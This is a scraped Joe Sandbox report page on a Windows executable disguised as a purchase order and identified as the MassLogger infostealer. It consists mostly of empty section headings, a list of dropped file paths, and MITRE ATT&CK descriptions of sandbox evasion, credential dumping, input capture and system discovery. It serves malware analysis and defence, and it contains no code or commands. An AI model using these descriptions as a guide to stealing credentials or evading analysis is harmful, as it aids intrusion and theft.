Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO #09465610_GQ 003745_SO-242000846.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: MassLogger

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Au3Check.exe

C:\Program Files (x86)\AutoIt3\Au3Info.exe

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Windows Analysis Report
PO #09465610_GQ 003745_SO-242000846.exe

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre